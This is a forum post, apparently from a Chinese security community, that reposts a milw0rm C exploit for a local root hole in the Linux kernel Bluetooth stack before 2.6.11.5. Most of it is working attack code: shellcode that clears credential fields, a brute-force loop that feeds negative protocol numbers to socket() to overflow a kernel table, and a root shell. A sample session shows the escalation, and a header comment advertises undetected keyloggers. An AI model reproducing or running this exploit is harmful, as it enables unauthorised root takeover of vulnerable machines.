‹‹ 上一主题 | 下一主题 ››
发新话题
打印

Linux Kernel < 2.6.11.5 BLUETOOTH Stack Local Root Exploit

ring04h

团队执行官

Rank: 8Rank: 8

E.S.T核心成员 社区主管

帖子
3910 
精华
128 
积分
209604 
阅读权限
200 
性别
男 
在线时间
1058 小时 
注册时间
2007-10-23 
最后登录
2008-5-13 

资料收集奖 运营支持奖

楼主 发表于 2007-12-19 16:59  只看该作者

Linux Kernel < 2.6.11.5 BLUETOOTH Stack Local Root Exploit

Code Language : C
  1. /* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT
  2. *
  3. * 19 October 2005
  4.  
  5. [url]http://backdoored.net[/url]
  6. Visit us for Undetected keyloggers and packers.Thanx
  7.  
  8.  
  9. h4x0r bluetooth $ id
  10. uid=1000(addicted) gid=100(users) groups=100(users)
  11. h4x0r bluetooth $
  12.  
  13. h4x0r bluetooth $ ./backdoored-bluetooth
  14. KERNEL Oops. Exit Code = 11.(Segmentation fault)
  15. KERNEL Oops. Exit Code = 11.(Segmentation fault)
  16. KERNEL Oops. Exit Code = 11.(Segmentation fault)
  17. KERNEL Oops. Exit Code = 11.(Segmentation fault)
  18. KERNEL Oops. Exit Code = 11.(Segmentation fault)
  19. Checking the Effective user id after overflow : UID = 0
  20. h4x0r bluetooth # id
  21. uid=0(root) gid=0(root) groups=100(users)
  22. h4x0r bluetooth #
  23.  
  24. h4x0r bluetooth # dmesg
  25. PREEMPT SMP
  26. Modules linked in:
  27. CPU:  0
  28. EIP:  0060:[<c0405ead>]  Not tainted VLI
  29. EFLAGS: 00010286  (2.6.9)
  30. EIP is at bt_sock_create+0x3d/0x130
  31. eax: ffffffff  ebx: ffebfe34  ecx: 00000000  edx: c051bea0
  32. esi: ffffffa3  edi: ffffff9f  ebp: 00000001  esp: c6729f1c
  33. ds: 007b  es: 007b  ss: 0068
  34. Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000 task=c6728a20)
  35. Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680 ffebfe34
  36.     00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34
  37.     c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80
  38. Call Trace:
  39.  [<c039a3bb>] __sock_create+0xfb/0x2a0
  40.  [<c039a58d>] sock_create+0x2d/0x40
  41.  [<c039a60b>] sys_socket+0x2b/0x60
  42.  [<c039b4e8>] sys_socketcall+0x68/0x260
  43.  [<c0117a9c>] finish_task_switch+0x3c/0x90
  44.  [<c0117b07>] schedule_tail+0x17/0x50
  45.  [<c0115410>] do_page_fault+0x0/0x5e9
  46.  [<c01031af>] syscall_call+0x7/0xb
  47. Code: 24 0c 89 7c 24 10 83 fb 07 0f 8f b1 00 00 00 8b 04 9d 60 a4 5d c0 85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00 <8b> 50 10 bf 01 00 00 00
  48. 85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40
  49.  
  50. */
  51.  
  52.  
  53. #include <stdio.h>
  54. #include <stdlib.h>
  55. #include <sys/socket.h>
  56. #include <arpa/inet.h>
  57. #include <sys/types.h>
  58. #include <unistd.h>
  59. #include <limits.h>
  60. #include <signal.h>
  61. #include <sys/wait.h>
  62.  
  63. #define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000
  64. #define KERNEL_SPACE_MEMORY_BRUTE_END  0xffffffff
  65. #define KERNEL_SPACE_BUFFER 0x100000
  66.  
  67.  
  68. char asmcode[] = /*Global shellcode*/
  69.  
  70. \"\xb8\x00\xf0\xff\xff\x31\xc9\x21\xe0\x8b\x10\x89\x8a\"
  71. \"\x80\x01\x00\x00\x31\xc9\x89\x8a\x7c\x01\x00\x00\x8b\"
  72. \"\x00\x31\xc9\x31\xd2\x89\x88\x90\x01\x00\x00\x89\x90\"
  73. \"\x8c\x01\x00\x00\xb8\xff\xff\xff\xff\xc3\";
  74.  
  75.  
  76.  
  77. struct net_proto_family {
  78. int family;
  79. int (*create) (int *sock, int protocol);
  80. short authentication;
  81. short encryption;
  82. short encrypt_net;
  83. int  *owner;
  84. };
  85.  
  86.  
  87. int check_zombie_child(int status,pid_t pid)
  88. {
  89. waitpid(pid,&status,0);
  90. if(WIFEXITED(status))
  91. {
  92. if(WEXITSTATUS(status) != 0xFF)
  93.  exit(-1);
  94. }
  95. else if (WIFSIGNALED(status))
  96.  {
  97.   printf(\"KERNEL Oops. Exit Code = %d.(%s)\n\",WTERMSIG(status),strsignal(WTERMSIG(status)));
  98.   return(WTERMSIG(status));
  99.  }
  100. }
  101.  
  102.  
  103. int brute_socket_create (int negative_proto_number)
  104. {
  105. socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */
  106. int i;
  107. i = geteuid();
  108. printf(\"Checking the Effective user id after overflow : UID = %d\n\",i);
  109. if(i)
  110. exit(EXIT_FAILURE);
  111. printf(\"0wnage D0ne bro.\n\");
  112. execl(\"/bin/sh\",\"sh\",NULL);
  113. exit(EXIT_SUCCESS);
  114. }
  115.  
  116.  
  117. int main(void)
  118. {
  119.  
  120. pid_t pid;
  121. int counter;
  122. int status;
  123. int *kernel_return;
  124.  
  125. char kernel_buffer[KERNEL_SPACE_BUFFER];
  126. unsigned int brute_start;
  127. unsigned int where_kernel;
  128.  
  129. struct net_proto_family *bluetooth;
  130.  
  131. bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family));
  132. bzero(bluetooth,sizeof(struct net_proto_family));
  133.  
  134. bluetooth->family = AF_BLUETOOTH;
  135. bluetooth->authentication = 0x0; /* No Authentication */
  136. bluetooth->encryption   = 0x0; /* No Encryption */
  137. bluetooth->encrypt_net  = 0x0; /* No Encrypt_net */
  138. bluetooth->owner     = 0x0; /* No fucking owner  */
  139. bluetooth->create     = (int *) asmcode;
  140.  
  141.  
  142.  
  143. kernel_return = (int *) kernel_buffer;
  144.  
  145. for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++)
  146.  *kernel_return = (int)bluetooth;
  147.  
  148. brute_start = KERNEL_SPACE_MEMORY_BRUTE_START;
  149. printf(\"Bluetooth stack local root exploit\n\");
  150. printf(\"http://backdoored/net\");
  151.  
  152. while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END )
  153. {
  154.  where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ;
  155.  where_kernel = -where_kernel;
  156.  
  157.  pid = fork();
  158.  if(pid == 0 )
  159.  brute_socket_create(where_kernel);
  160.  check_zombie_child(status,pid);
  161.  brute_start += KERNEL_SPACE_BUFFER;
  162.  fflush(stdout);
  163. }
  164. return 0;
  165. }
  166.  
  167. // milw0rm.com [2007-12-18]
Parsed in 0.019 seconds
...退出这个无聊的娱乐圈!

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题